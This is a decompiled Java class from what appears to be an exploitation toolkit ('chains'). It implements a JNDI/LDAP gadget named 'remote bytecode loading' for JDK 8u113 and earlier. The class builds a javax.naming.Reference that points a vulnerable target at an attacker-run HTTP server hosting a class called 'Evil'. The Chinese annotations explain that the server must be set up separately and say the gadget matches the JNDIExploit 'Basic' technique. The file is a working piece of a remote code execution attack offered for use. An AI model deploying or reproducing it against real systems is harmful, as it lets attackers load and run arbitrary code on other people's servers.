package com.ar3h.chains.gadget.impl.jndi;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import javax.naming.Reference;

@GadgetAnnotation(name = "远程字节码加载", description = "LDAP加载字节码姿势，等同于 JNDIExploit 中的 Basic 利用方式\n此链需要另外手动开启 HTTP 服务去挂载字节码，请求字节码uri路径为 Evil.class\n\ncode: new Reference(this.className, this.className, this.url)", dependencies = {"<=jdk8u113"}, authors = {Authors.Ar3h})
@GadgetTags(tags = {Tag.Reference, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/LdapClassLoader.class */
public class LdapClassLoader implements Gadget {

    @Param(name = "http地址", description = "内部处理逻辑会自动判断并在 url 末尾加上 / 符，防止无法正常进行漏洞利用\neg: http://127.0.0.1:12345/")
    public String url;

    @Param(name = "字节码类名", description = "eg: Evil\n请求后会访问 Evil.class 文件")
    public String className = "Evil";

    public Object getObject() {
        if (this.url != null && !this.url.endsWith("/")) {
            this.url += "/";
        }
        return new Reference(this.className, this.className, this.url);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
